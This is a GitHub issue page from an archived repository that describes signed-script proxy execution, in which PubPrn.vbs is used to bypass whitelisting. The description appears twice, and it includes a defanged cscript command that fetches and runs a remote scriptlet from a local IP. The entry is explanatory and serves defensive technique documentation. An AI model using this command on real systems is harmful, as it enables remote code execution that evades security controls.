You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Apr 9, 2024. It is now read-only.
Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png
There are several other signed scripts that may be used in a similar manner. [2]
The text was updated successfully, but these errors were encountered:
Description
Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png
There are several other signed scripts that may be used in a similar manner. [2]
The text was updated successfully, but these errors were encountered: